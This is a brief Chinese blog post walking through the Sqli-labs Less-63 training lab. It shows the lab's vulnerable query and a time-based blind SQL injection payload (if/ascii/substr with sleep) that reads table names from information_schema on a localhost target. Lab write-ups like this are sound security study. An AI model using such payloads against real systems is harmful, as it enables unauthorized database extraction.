Sqli-labs Less-63 延时注入 130次机会

和less62一致，我们只需要看到sql语句上

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

因此构造payload：

http://127.0.0.1/sql/Less-63/?id=1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=79,0,sleep(10))--+

当正确的时候时间很短，当错误的时候时间大于10秒

posted @ 2020-04-09 22:55 zhengna 阅读(232) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

Sqli-labs Less-63 延时注入 130次机会

公告